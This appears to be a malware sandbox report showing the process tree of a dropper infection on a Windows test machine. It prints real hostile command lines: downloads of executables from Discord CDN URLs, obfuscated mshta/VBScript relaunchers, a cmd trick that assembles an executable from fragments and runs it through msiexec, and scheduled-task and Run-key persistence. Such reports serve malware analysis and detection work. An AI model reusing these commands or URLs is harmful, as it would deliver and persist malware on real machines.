                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:6348
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:8072
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:4772
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1169\Transmissibility.exe
                                                                                                                                                                                                                    Transmissibility.exe
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:6384
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                        PID:5012
                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\ROKEqOhVK1b69uHCUbon1CXS.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\ROKEqOhVK1b69uHCUbon1CXS.exe"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:5352
                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\erU7qk9q9dSAOi8To0x09W6w.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\erU7qk9q9dSAOi8To0x09W6w.exe"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:5896
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\Zz_Kz0VjFFF_1CMdwOqI2jwN.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\Zz_Kz0VjFFF_1CMdwOqI2jwN.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                      PID:5764
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:5536
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:6944
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                PID:5188
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                                                                                  8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:1500
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:4592
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                            PID:5792
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                            PID:6776
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                PID:6152
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                    PID:3484
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:5192
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                    msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:3272
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              taskkill -im "6GLTtvyB0S9ougfOh2CXRyih.exe" -F
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                              PID:5592
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:364
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                        Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:2724
                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                                                        PID:3448
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                      PID:676
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon179f74c0ff3cf1f.exe
                                                                                                                                                                                                                                        Mon179f74c0ff3cf1f.exe
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                        PID:884
                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\N9N76vYxukkwQD1CI_UpvR65.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\N9N76vYxukkwQD1CI_UpvR65.exe"
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:4700
                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\kFIU1_JeHEHjhfjNChRqTOn8.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\kFIU1_JeHEHjhfjNChRqTOn8.exe"
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:5824
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                              PID:7260
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                              PID:7224
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\plnTHKl8cQG5waAHP2YJZuCW.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\plnTHKl8cQG5waAHP2YJZuCW.exe"
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                              PID:7188
                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe"
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                  PID:3496
                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe"
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                    PID:984
                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe"
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                      PID:6996
                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe"
                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                        PID:5124
                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe"
                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                          PID:6600
                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"
                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                            PID:7204
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                PID:7356
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                    PID:4596
                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                        PID:6364
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                                                                        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                          PID:7360
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                              PID:4176
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                  PID:7876
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                  PID:5820
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                      PID:7740
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                                                                          PID:5164
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                                            PID:7400
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                            msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:7832
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                      taskkill -f -iM "Hb6h5uEbcZ1THC4k6kC2dsk3.exe"
                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                      PID:7208
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"
                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                  PID:7444
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe" -u
                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                      PID:7724
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe"
                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                      PID:6368
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                                                        PID:5536
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                            PID:9024
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x54,0x60,0x19c,0x1b8,0x1d4,0x7ffbc68adec0,0x7ffbc68aded0,0x7ffbc68adee0
                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                PID:8660
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7ff7855c9e70,0x7ff7855c9e80,0x7ff7855c9e90
                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                    PID:8736
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,6480581147440966869,9115839833656413535,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9024_1598510187" --mojo-platform-channel-handle=1660 /prefetch:8
                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                    PID:9064
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"
                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                PID:7544
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-2F3P3.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-2F3P3.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp" /SL5="$302DA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"
                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                  PID:888
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-GLV4V.tmp\DYbALA.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-GLV4V.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                      PID:3448
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\b8-d3ca8-af4-a7dbf-375e4b752d217\Kiguguzholi.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\b8-d3ca8-af4-a7dbf-375e4b752d217\Kiguguzholi.exe"
                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                          PID:8004
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rehxitoz.f4n\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                                              PID:364
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\rehxitoz.f4n\GcleanerEU.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\rehxitoz.f4n\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                  PID:1776
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aodn1gbl.0lu\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                                  PID:1912
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\aodn1gbl.0lu\installer.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\aodn1gbl.0lu\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                      PID:7360
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe & exit
                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                      PID:2296
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe
                                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                                          PID:7860
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe" -u
                                                                                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:5208
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dibkstc0.3u2\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                                          PID:396
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                                                                                              PID:5164
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\dibkstc0.3u2\gcleaner.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\dibkstc0.3u2\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                PID:7404
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
